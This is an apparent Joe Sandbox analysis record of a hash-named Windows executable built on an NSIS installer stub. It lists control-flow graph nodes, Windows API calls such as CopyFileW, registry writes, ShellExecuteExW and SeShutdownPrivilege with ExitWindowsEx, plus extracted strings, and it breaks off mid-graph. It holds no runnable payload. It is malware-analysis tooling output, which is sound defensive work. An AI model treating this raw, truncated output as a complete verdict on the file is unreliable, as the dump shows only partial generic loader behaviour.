404d58 4330->4331 4332 406579 17 API calls 4331->4332 4333 404dbc 4332->4333 4334 406579 17 API calls 4333->4334 4335 404dc7 4334->4335 4336 406579 17 API calls 4335->4336 4337 404ddd lstrlenW wsprintfW SetDlgItemTextW 4336->4337 4337->4326 4338 4019ff 4339 402d3e 17 API calls 4338->4339 4340 401a06 4339->4340 4341 402d3e 17 API calls 4340->4341 4342 401a0f 4341->4342 4343 401a16 lstrcmpiW 4342->4343 4344 401a28 lstrcmpW 4342->4344 4345 401a1c 4343->4345 4344->4345 4346 401000 4347 401037 BeginPaint GetClientRect 4346->4347 4348 40100c DefWindowProcW 4346->4348 4350 4010f3 4347->4350 4351 401179 4348->4351 4352 401073 CreateBrushIndirect FillRect DeleteObject 4350->4352 4353 4010fc 4350->4353 4352->4350 4354 401102 CreateFontIndirectW 4353->4354 4355 401167 EndPaint 4353->4355 4354->4355 4356 401112 6 API calls 4354->4356 4355->4351 4356->4355 4357 401d81 4358 401d94 GetDlgItem 4357->4358 4359 401d87 4357->4359 4361 401d8e 4358->4361 4360 402d1c 17 API calls 4359->4360 4360->4361 4362 402d3e 17 API calls 4361->4362 4364 401dd5 GetClientRect LoadImageW SendMessageW 4361->4364 4362->4364 4365 401e33 4364->4365 4367 401e3f 4364->4367 4366 401e38 DeleteObject 4365->4366 4365->4367 4366->4367 4368 404602 lstrlenW 4369 404621 4368->4369 4370 404623 WideCharToMultiByte 4368->4370 4369->4370 4371 402902 4372 402d3e 17 API calls 4371->4372 4373 402909 FindFirstFileW 4372->4373 4374 402931 4373->4374 4375 40291c 4373->4375 4379 406483 wsprintfW 4374->4379 4377 40293a 4380 40653c lstrcpynW 4377->4380 4379->4377 4380->4375 4381 402482 4382 402d3e 17 API calls 4381->4382 4383 402494 4382->4383 4384 402d3e 17 API calls 4383->4384 4385 40249e 4384->4385 4398 402dce 4385->4398 4388 4024d6 4392 402d1c 17 API calls 4388->4392 4395 4024e2 4388->4395 4389 402d3e 17 API calls 4391 4024cc lstrlenW 4389->4391 4390 402925 4391->4388 4392->4395 4393 402501 RegSetValueExW 4394 402517 RegCloseKey 4393->4394 4394->4390 4395->4393 4396 403309 44 API calls 4395->4396 4396->4393 4399 402de9 4398->4399 4402 4063d7 4399->4402 4403 4063e6 4402->4403 4404 4063f1 RegCreateKeyExW 4403->4404 4405 4024ae 4403->4405 4404->4405 4405->4388 4405->4389 4405->4390 4406 401503 4407 40150b 4406->4407 4409 40151e 4406->4409 4408 402d1c 17 API calls 4407->4408 4408->4409 4410 404983 4411 4049c0 4410->4411 4412 4049af 4410->4412 4414 4049cc GetDlgItem 4411->4414 4419 404a2b 4411->4419 4471 405b86 GetDlgItemTextW 4412->4471 4416 4049e0 4414->4416 4415 4049ba 4418 4067eb 5 API calls 4415->4418 4421 4049f4 SetWindowTextW 4416->4421 4426 405ebc 4 API calls 4416->4426 4417 404b0f 4469 404cbe 4417->4469 4473 405b86 GetDlgItemTextW 4417->4473 4418->4411 4419->4417 4423 406579 17 API calls 4419->4423 4419->4469 4424 404492 18 API calls 4421->4424 4422 404b3f 4427 405f19 18 API calls 4422->4427 4428 404a9f SHBrowseForFolderW 4423->4428 4429 404a10 4424->4429 4425 4044f9 8 API calls 4430 404cd2 4425->4430 4431 4049ea 4426->4431 4432 404b45 4427->4432 4428->4417 4433 404ab7 CoTaskMemFree 4428->4433 4434 404492 18 API calls 4429->4434 4431->4421 4435 405e11 3 API calls 4431->4435 4474 40653c lstrcpynW 4432->4474 4436 405e11 3 API calls 4433->4436 4437 404a1e 4434->4437 4435->4421 4438 404ac4 4436->4438 4472 4044c7 SendMessageW 4437->4472 4441 404afb SetDlgItemTextW 4438->4441 4446 406579 17 API calls 4438->4446 4441->4417 4442 404a24 4444 406931 5 API calls 4442->4444 4443 404b5c 4445 406931 5 API calls 4443->4445 4444->4419 4453 404b63 4445->4453 4447 404ae3 lstrcmpiW 4446->4447 4447->4441 4450 404af4 lstrcatW 4447->4450 4448 404ba4 4475 40653c lstrcpynW 4448->4475 4450->4441 4451 404bab 4452 405ebc 4 API calls 4451->4452 4454 404bb1 GetDiskFreeSpaceW 4452->4454 4453->4448 4456 405e5d 2 API calls 4453->4456 4458 404bfc 4453->4458 4457 404bd5 MulDiv 4454->4457 4454->4458 4456->4453 4457->4458 4459 404c6d 4458->4459 4460 404e08 20 API calls 4458->4460 4461 404c90 4459->4461 4462 40140b 2 API calls 4459->4462 4463 404c5a 4460->4463 4476 4044b4 EnableWindow 4461->4476 4462->4461 4465 404c6f SetDlgItemTextW 4463->4465 4466 404c5f 4463->4466 4465->4459 4468 404d3f 20 API calls 4466->4468 4467 404cac 4467->4469 4470 4048dc SendMessageW 4467->4470 4468->4459 4469->4425 4470->4469 4471->4415 4472->4442 4473->4422 4474->4443 4475->4451 4476->4467 3702 401389 3704 401390 3702->3704 3703 4013fe 3704->3703 3705 4013cb MulDiv SendMessageW 3704->3705 3705->3704 4477 402889 4478 402890 4477->4478 4484 402b0d 4477->4484 4479 402d1c 17 API calls 4478->4479 4480 402897 4479->4480 4481 4028a6 SetFilePointer 4480->4481 4482 4028b6 4481->4482 4481->4484 4485 406483 wsprintfW 4482->4485 4485->4484 4486 40190c 4487 401943 4486->4487 4488 402d3e 17 API calls 4487->4488 4489 401948 4488->4489 4490 405c4e 67 API calls 4489->4490 4491 401951 4490->4491 4492 40190f 4493 402d3e 17 API calls 4492->4493 4494 401916 4493->4494 4495 405ba2 MessageBoxIndirectW 4494->4495 4496 40191f 4495->4496 4504 401491 4505 4055a4 24 API calls 4504->4505 4506 401498 4505->4506 4514 401f12 4515 402d3e 17 API calls 4514->4515 4516 401f18 4515->4516 4517 402d3e 17 API calls 4516->4517 4518 401f21 4517->4518 4519 402d3e 17 API calls 4518->4519 4520 401f2a 4519->4520 4521 402d3e 17 API calls 4520->4521 4522 401f33 4521->4522 4523 401423 24 API calls 4522->4523 4524 401f3a 4523->4524 4531 405b68 ShellExecuteExW 4524->4531 4526 401f82 4528 402925 4526->4528 4532 4069dc WaitForSingleObject 4526->4532 4529 401f9f CloseHandle 4529->4528 4531->4526 4533 4069f6 4532->4533 4534 406a08 GetExitCodeProcess 4533->4534 4535 40696d 2 API calls 4533->4535 4534->4529 4536 4069fd WaitForSingleObject 4535->4536 4536->4533 4537 402614 4538 402d3e 17 API calls 4537->4538 4539 40261b 4538->4539 4542 406032 GetFileAttributesW CreateFileW 4539->4542 4541 402627 4542->4541 4543 402596 4553 402d7e 4543->4553 4546 402d1c 17 API calls 4547 4025a9 4546->4547 4548 4025d1 RegEnumValueW 4547->4548 4549 4025c5 RegEnumKeyW 4547->4549 4550 402925 4547->4550 4551 4025e6 RegCloseKey 4548->4551 4549->4551 4551->4550 4554 402d3e 17 API calls 4553->4554 4555 402d95 4554->4555 4556 4063a9 RegOpenKeyExW 4555->4556 4557 4025a0 4556->4557 4557->4546 4558 401d17 4559 402d1c 17 API calls 4558->4559 4560 401d1d IsWindow 4559->4560 4561 401a20 4560->4561 4562 405518 4563 405528 4562->4563 4564 40553c 4562->4564 4565 40552e 4563->4565 4574 405585 4563->4574 4566 405544 IsWindowVisible 4564->4566 4572 40555b 4564->4572 4568 4044de SendMessageW 4565->4568 4569 405551 4566->4569 4566->4574 4567 40558a CallWindowProcW 4570 405538 4567->4570 4568->4570 4571 404e4d 5 API calls 4569->4571 4571->4572 4572->4567 4573 404ecd 4 API calls 4572->4573 4573->4574 4574->4567 3706 403b19 3707 403b34 3706->3707 3708 403b2a CloseHandle 3706->3708 3709 403b48 3707->3709 3710 403b3e CloseHandle 3707->3710 3708->3707 3715 403b76 3709->3715 3710->3709 3716 403b84 3715->3716 3717 403b4d 3716->3717 3718 403b89 FreeLibrary GlobalFree 3716->3718 3719 405c4e 3717->3719 3718->3717 3718->3718 3720 405f19 18 API calls 3719->3720 3721 405c6e 3720->3721 3722 405c76 DeleteFileW 3721->3722 3723 405c8d 3721->3723 3752 403b59 3722->3752 3724 405dad 3723->3724 3755 40653c lstrcpynW 3723->3755 3731 40689a 2 API calls 3724->3731 3724->3752 3726 405cb3 3727 405cc6 3726->3727 3728 405cb9 lstrcatW 3726->3728 3730 405e5d 2 API calls 3727->3730 3729 405ccc 3728->3729 3732 405cdc lstrcatW 3729->3732 3734 405ce7 lstrlenW FindFirstFileW 3729->3734 3730->3729 3733 405dd2 3731->3733 3732->3734 3735 405e11 3 API calls 3733->3735 3733->3752 3734->3724 3737 405d09 3734->3737 3736 405ddc 3735->3736 3739 405c06 5 API calls 3736->3739 3738 405d90 FindNextFileW 3737->3738 3748 405c4e 60 API calls 3737->3748 3750 4055a4 24 API calls 3737->3750 3753 4055a4 24 API calls 3737->3753 3754 406302 36 API calls 3737->3754 3756 40653c lstrcpynW 3737->3756 3757 405c06 3737->3757 3738->3737 3742 405da6 FindClose 3738->3742 3741 405de8 3739->3741 3743 405e02 3741->3743 3744 405dec 3741->3744 3742->3724 3746 4055a4 24 API calls 3743->3746 3747 4055a4 24 API calls 3744->3747 3744->3752 3746->3752 3749 405df9 3747->3749 3748->3737 3751 406302 36 API calls 3749->3751 3750->3738 3751->3752 3753->3737 3754->3737 3755->3726 3756->3737 3765 40600d GetFileAttributesW 3757->3765 3760 405c33 3760->3737 3761 405c21 RemoveDirectoryW 3763 405c2f 3761->3763 3762 405c29 DeleteFileW 3762->3763 3763->3760 3764 405c3f SetFileAttributesW 3763->3764 3764->3760 3766 405c12 3765->3766 3767 40601f SetFileAttributesW 3765->3767 3766->3760 3766->3761 3766->3762 3767->3766 4582 401b9b 4583 401bec 4582->4583 4584 401ba8 4582->4584 4586 401bf1 4583->4586 4587 401c16 GlobalAlloc 4583->4587 4585 401c31 4584->4585 4590 401bbf 4584->4590 4588 406579 17 API calls 4585->4588 4596 402395 4585->4596 4586->4596 4603 40653c lstrcpynW 4586->4603 4589 406579 17 API calls 4587->4589 4591 40238f 4588->4591 4589->4585 4601 40653c lstrcpynW 4590->4601 4597 405ba2 MessageBoxIndirectW 4591->4597 4594 401c03 GlobalFree 4594->4596 4595 401bce 4602 40653c lstrcpynW 4595->4602 4597->4596 4599 401bdd 4604 40653c lstrcpynW 4599->4604 4601->4595 4602->4599 4603->4594 4604->4596 4605 402b9d SendMessageW 4606 402bb7 InvalidateRect 4605->4606 4607 402bc2 4605->4607 4606->4607 4608 40149e 4609 402395 4608->4609 4610 4014ac PostQuitMessage 4608->4610 4610->4609 4611 402522 4612 402d7e 17 API calls 4611->4612 4613 40252c 4612->4613 4614 402d3e 17 API calls 4613->4614 4615 402535 4614->4615 4616 402540 RegQueryValueExW 4615->4616 4621 402925 4615->4621 4617 402560 4616->4617 4618 402566 RegCloseKey 4616->4618 4617->4618 4622 406483 wsprintfW 4617->4622 4618->4621 4622->4618 4623 4021a2 4624 402d3e 17 API calls 4623->4624 4625 4021a9 4624->4625 4626 402d3e 17 API calls 4625->4626 4627 4021b3 4626->4627 4628 402d3e 17 API calls 4627->4628 4629 4021bd 4628->4629 4630 402d3e 17 API calls 4629->4630 4631 4021c7 4630->4631 4632 402d3e 17 API calls 4631->4632 4634 4021d1 4632->4634 4633 402210 CoCreateInstance 4638 40222f 4633->4638 4634->4633 4635 402d3e 17 API calls 4634->4635 4635->4633 4636 401423 24 API calls 4637 4022ee 4636->4637 4638->4636 4638->4637 4639 4015a3 4640 402d3e 17 API calls 4639->4640 4641 4015aa SetFileAttributesW 4640->4641 4642 4015bc 4641->4642 4643 401fa4 4644 402d3e 17 API calls 4643->4644 4645 401faa 4644->4645 4646 4055a4 24 API calls 4645->4646 4647 401fb4 4646->4647 4648 405b25 2 API calls 4647->4648 4649 401fba 4648->4649 4650 401fdd CloseHandle 4649->4650 4652 4069dc 5 API calls 4649->4652 4653 402925 4649->4653 4650->4653 4654 401fcf 4652->4654 4654->4650 4656 406483 wsprintfW 4654->4656 4656->4650 4664 40202a 4665 402d3e 17 API calls 4664->4665 4666 402031 4665->4666 4667 406931 5 API calls 4666->4667 4668 402040 4667->4668 4669 4020c4 4668->4669 4670 40205c GlobalAlloc 4668->4670 4670->4669 4671 402070 4670->4671 4672 406931 5 API calls 4671->4672 4673 402077 4672->4673 4674 406931 5 API calls 4673->4674 4675 402081 4674->4675 4675->4669 4679 406483 wsprintfW 4675->4679 4677 4020b6 4680 406483 wsprintfW 4677->4680 4679->4677 4680->4669 4681 4023aa 4682 4023b2 4681->4682 4683 4023b8 4681->4683 4684 402d3e 17 API calls 4682->4684 4685 4023c6 4683->4685 4686 402d3e 17 API calls 4683->4686 4684->4683 4687 4023d4 4685->4687 4688 402d3e 17 API calls 4685->4688 4686->4685 4689 402d3e 17 API calls 4687->4689 4688->4687 4690 4023dd WritePrivateProfileStringW 4689->4690 4691 402f2b 4692 402f56 4691->4692 4693 402f3d SetTimer 4691->4693 4694 402fa4 4692->4694 4695 402faa MulDiv 4692->4695 4693->4692 4696 402f64 wsprintfW SetWindowTextW SetDlgItemTextW 4695->4696 4696->4694 4698 40242c 4699 402434 4698->4699 4700 40245f 4698->4700 4701 402d7e 17 API calls 4699->4701 4702 402d3e 17 API calls 4700->4702 4703 40243b 4701->4703 4704 402466 4702->4704 4706 402d3e 17 API calls 4703->4706 4707 402473 4703->4707 4709 402dfc 4704->4709 4708 40244c RegDeleteValueW RegCloseKey 4706->4708 4708->4707 4710 402e10 4709->4710 4712 402e09 4709->4712 4710->4712 4713 402e41 4710->4713 4712->4707 4714 4063a9 RegOpenKeyExW 4713->4714 4715 402e6f 4714->4715 4716 402e7f RegEnumValueW 4715->4716 4720 402ea2 4715->4720 4724 402f19 4715->4724 4717 402f09 RegCloseKey 4716->4717 4716->4720 4717->4724 4718 402ede RegEnumKeyW 4719 402ee7 RegCloseKey 4718->4719 4718->4720 4721 406931 5 API calls 4719->4721 4720->4717 4720->4718 4720->4719 4722 402e41 6 API calls 4720->4722 4723 402ef7 4721->4723 4722->4720 4723->4724 4725 402efb RegDeleteKeyW 4723->4725 4724->4712 4725->4724 4726 401a30 4727 402d3e 17 API calls 4726->4727 4728 401a39 ExpandEnvironmentStringsW 4727->4728 4729 401a60 4728->4729 4730 401a4d 4728->4730 4730->4729 4731 401a52 lstrcmpW 4730->4731 4731->4729 4737 401735 4738 402d3e 17 API calls 4737->4738 4739 40173c SearchPathW 4738->4739 4740 401757 4739->4740 4741 402636 4742 402665 4741->4742 4743 40264a 4741->4743 4744 402695 4742->4744 4745 40266a 4742->4745 4746 402d1c 17 API calls 4743->4746 4748 402d3e 17 API calls 4744->4748 4747 402d3e 17 API calls 4745->4747 4753 402651 4746->4753 4749 402671 4747->4749 4750 40269c lstrlenW 4748->4750 4758 40655e WideCharToMultiByte 4749->4758 4750->4753 4752 402685 lstrlenA 4752->4753 4754 4026df 4753->4754 4755 4026c9 4753->4755 4757 406113 5 API calls 4753->4757 4755->4754 4756 4060e4 WriteFile 4755->4756 4756->4754 4757->4755 4758->4752 4759 401d38 4760 402d1c 17 API calls 4759->4760 4761 401d3f 4760->4761 4762 402d1c 17 API calls 4761->4762 4763 401d4b GetDlgItem 4762->4763 4764 402630 4763->4764 4765 4014b8 4766 4014be 4765->4766 4767 401389 2 API calls 4766->4767 4768 4014c6 4767->4768 4769 403fb9 4770 403fd1 4769->4770 4771 40410c 4769->4771 4770->4771 4772 403fdd 4770->4772 4773 40411d GetDlgItem GetDlgItem 4771->4773 4782 40415d 4771->4782 4774 403fe8 SetWindowPos 4772->4774 4775 403ffb 4772->4775 4776 404492 18 API calls 4773->4776 4774->4775 4779 404000 ShowWindow 4775->4779 4780 404018 4775->4780 4781 404147 SetClassLongW 4776->4781 4777 4041b7 4778 4044de SendMessageW 4777->4778 4783 404107 4777->4783 4809 4041c9 4778->4809 4779->4780 4784 404020 DestroyWindow 4780->4784 4785 40403a 4780->4785 4786 40140b 2 API calls 4781->4786 4782->4777 4787 401389 2 API calls 4782->4787 4788 40441b 4784->4788 4789 404050 4785->4789 4790 40403f SetWindowLongW 4785->4790 4786->4782 4791 40418f 4787->4791 4788->4783 4798 40444c ShowWindow 4788->4798 4795 4040c7 4789->4795 4796 40405c GetDlgItem 4789->4796 4790->4783 4791->4777 4792 404193 SendMessageW 4791->4792 4792->4783 4793 40140b 2 API calls 4793->4809 4794 40441d DestroyWindow EndDialog 4794->4788 4797 4044f9 8 API calls 4795->4797 4799 40408c 4796->4799 4800 40406f SendMessageW IsWindowEnabled 4796->4800 4797->4783 4798->4783 4802 404099 4799->4802 4803 4040e0 SendMessageW 4799->4803 4804 4040ac 4799->4804 4812 404091 4799->4812 4800->4783 4800->4799 4801 406579 17 API calls 4801->4809 4802->4803 4802->4812 4803->4795 4807 4040b4 4804->4807 4808 4040c9 4804->4808 4805 40446b SendMessageW 4805->4795 4806 404492 18 API calls 4806->4809 4810 40140b 2 API calls 4807->4810 4811 40140b 2 API calls 4808->4811 4809->4783 4809->4793 4809->4794 4809->4801 4809->4806 4813 404492 18 API calls 4809->4813 4829 40435d DestroyWindow 4809->4829 4810->4812 4811->4812 4812->4795 4812->4805 4814 404244 GetDlgItem 4813->4814 4815 404261 ShowWindow EnableWindow 4814->4815 4816 404259 4814->4816 4838 4044b4 EnableWindow 4815->4838 4816->4815 4818 40428b EnableWindow 4823 40429f 4818->4823 4819 4042a4 GetSystemMenu EnableMenuItem SendMessageW 4820 4042d4 SendMessageW 4819->4820 4819->4823 4820->4823 4822 403f9a 18 API calls 4822->4823 4823->4819 4823->4822 4839 4044c7 SendMessageW 4823->4839 4840 40653c lstrcpynW 4823->4840 4825 404303 lstrlenW 4826 406579 17 API calls 4825->4826 4827 404319 SetWindowTextW 4826->4827 4828 401389 2 API calls 4827->4828 4828->4809 4829->4788 4830 404377 CreateDialogParamW 4829->4830 4830->4788 4831 4043aa 4830->4831 4832 404492 18 API calls 4831->4832 4833 4043b5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4832->4833 4834 401389 2 API calls 4833->4834 4835 4043fb 4834->4835 4835->4783 4836 404403 ShowWindow 4835->4836 4837 4044de SendMessageW 4836->4837 4837->4788 4838->4818 4839->4823 4840->4825 4841 4028bb 4842 4028c1 4841->4842 4843 402bc2 4842->4843 4844 4028c9 FindClose 4842->4844 4844->4843 4845 40493c 4846 404972 4845->4846 4847 40494c 4845->4847 4849 4044f9 8 API calls 4846->4849 4848 404492 18 API calls 4847->4848 4851 404959 SetDlgItemTextW 4848->4851 4850 40497e 4849->4850 4851->4846

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 4035d8-403615 SetErrorMode GetVersion 1 403617-40361f call 406931 0->1 2 403628 0->2 1->2 8 403621 1->8 3 40362d-403641 call 4068c1 lstrlenA 2->3 9 403643-40365f call 406931 * 3 3->9 8->2 16 403670-4036cf #17 OleInitialize SHGetFileInfoW call 40653c GetCommandLineW call 40653c 9->16 17 403661-403667 9->17 24 4036d1-4036d8 16->24 25 4036d9-4036f3 call 405e3e CharNextW 16->25 17->16 22 403669 17->22 22->16 24->25 28 4036f9-4036ff 25->28 29 40380a-403824 GetTempPathW call 4035a7 25->29 31 403701-403706 28->31 32 403708-40370c 28->32 36 403826-403844 GetWindowsDirectoryW lstrcatW call 4035a7 29->36 37 40387c-403896 DeleteFileW call 403068 29->37 31->31 31->32 34 403713-403717 32->34 35 40370e-403712 32->35 38 4037d6-4037e3 call 405e3e 34->38 39 40371d-403723 34->39 35->34 36->37 54 403846-403876 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4035a7 36->54 57 403947-403957 ExitProcess OleUninitialize 37->57 58 40389c-4038a2 37->58 55 4037e5-4037e6 38->55 56 4037e7-4037ed 38->56 43 403725-40372d 39->43 44 40373e-403777 39->44 50 403734 43->50 51 40372f-403732 43->51 45 403794-4037ce 44->45 46 403779-40377e 44->46 45->38 53 4037d0-4037d4 45->53 46->45 52 403780-403788 46->52 50->44 51->44 51->50 61 40378a-40378d 52->61 62 40378f 52->62 53->38 63 4037f5-403803 call 40653c 53->63 54->37 54->57 55->56 56->28 65 4037f3 56->65 59 403a7d-403a83 57->59 60 40395d-40396d call 405ba2 ExitProcess 57->60 66 403937-40393e call 403c0b 58->66 67 4038a8-4038b3 call 405e3e 58->67 69 403b01-403b09 59->69 70 403a85-403a9b GetCurrentProcess OpenProcessToken 59->70 61->45 61->62 62->45 72 403808 63->72 65->72 76 403943 66->76 83 403901-40390b 67->83 84 4038b5-4038ea 67->84 77 403b0b 69->77 78 403b0f-403b13 ExitProcess 69->78 80 403ad1-403adf call 406931 70->80 81 403a9d-403acb LookupPrivilegeValueW AdjustTokenPrivileges 70->81 72->29 76->57 77->78 94 403ae1-403aeb 80->94 95 403aed-403af8 ExitWindowsEx 80->95 81->80 87 403973-403987 call 405b0d lstrcatW 83->87 88 40390d-40391b call 405f19 83->88 86 4038ec-4038f0 84->86 90 4038f2-4038f7 86->90 91 4038f9-4038fd 86->91 101 403994-4039ae lstrcatW lstrcmpiW 87->101 102 403989-40398f lstrcatW 87->102 88->57 103 40391d-403933 call 40653c * 2 88->103 90->91 97 4038ff 90->97 91->86 91->97 94->95 96 403afa-403afc call 40140b 94->96 95->69 95->96 96->69 97->83 101->57 105 4039b0-4039b3 101->105 102->101 103->66 107 4039b5-4039ba call 405a73 105->107 108 4039bc call 405af0 105->108 113 4039c1-4039cf SetCurrentDirectoryW 107->113 108->113 116 4039d1-4039d7 call 40653c 113->116 117 4039dc-403a05 call 40653c 113->117 116->117 121 403a0a-403a26 call 406579 DeleteFileW 117->121 124 403a67-403a6f 121->124 125 403a28-403a38 CopyFileW 121->125 124->121 126 403a71-403a78 call 406302 124->126 125->124 127 403a3a-403a5a call 406302 call 406579 call 405b25 125->127 126->57 127->124 136 403a5c-403a63 CloseHandle 127->136 136->124
                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 004035FB
                                        • GetVersion.KERNEL32 ref: 00403601
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
                                        • OleInitialize.OLE32(00000000), ref: 00403678
                                        • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
                                        • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",00000020,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",00000000,?,00000007,00000009,0000000B), ref: 004036E1
                                          • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                          • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403838
                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403854
                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
                                        • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                                          • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                        • ExitProcess.KERNEL32(00000007,?,00000007,00000009,0000000B), ref: 00403947
                                        • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
                                        • ExitProcess.KERNEL32 ref: 0040396D
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403980
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040398F
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040399A
                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
                                        • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
                                        • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
                                        • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                        • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                        • ExitProcess.KERNEL32 ref: 00403B13
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                        • API String ID: 424501083-572611694
                                        • Opcode ID: 192a59dcd8014d98a74b0244e035758c3ace76d32184e7546451a3a8955dee98
                                        • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
                                        • Opcode Fuzzy Hash: 192a59dcd8014d98a74b0244e035758c3ace76d32184e7546451a3a8955dee98
                                        • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 137 403c0b-403c23 call 406931 140 403c25-403c30 GetUserDefaultUILanguage call 406483 137->140 141 403c37-403c6e call 40640a 137->141 144 403c35 140->144 147 403c70-403c81 call 40640a 141->147 148 403c86-403c8c lstrcatW 141->148 146 403c91-403cba call 403ee1 call 405f19 144->146 154 403cc0-403cc5 146->154 155 403d4c-403d54 call 405f19 146->155 147->148 148->146 154->155 156 403ccb-403cf3 call 40640a 154->156 161 403d62-403d87 LoadImageW 155->161 162 403d56-403d5d call 406579 155->162 156->155 163 403cf5-403cf9 156->163 165 403e08-403e10 call 40140b 161->165 166 403d89-403db9 RegisterClassW 161->166 162->161 167 403d0b-403d17 lstrlenW 163->167 168 403cfb-403d08 call 405e3e 163->168 177 403e12-403e15 165->177 178 403e1a-403e25 call 403ee1 165->178 169 403ed7 166->169 170 403dbf-403e03 SystemParametersInfoW CreateWindowExW 166->170 174 403d19-403d27 lstrcmpiW 167->174 175 403d3f-403d47 call 405e11 call 40653c 167->175 168->167 173 403ed9-403ee0 169->173 170->165 174->175 181 403d29-403d33 GetFileAttributesW 174->181 175->155 177->173 189 403e2b-403e45 ShowWindow call 4068c1 178->189 190 403eae-403eb6 call 405677 178->190 184 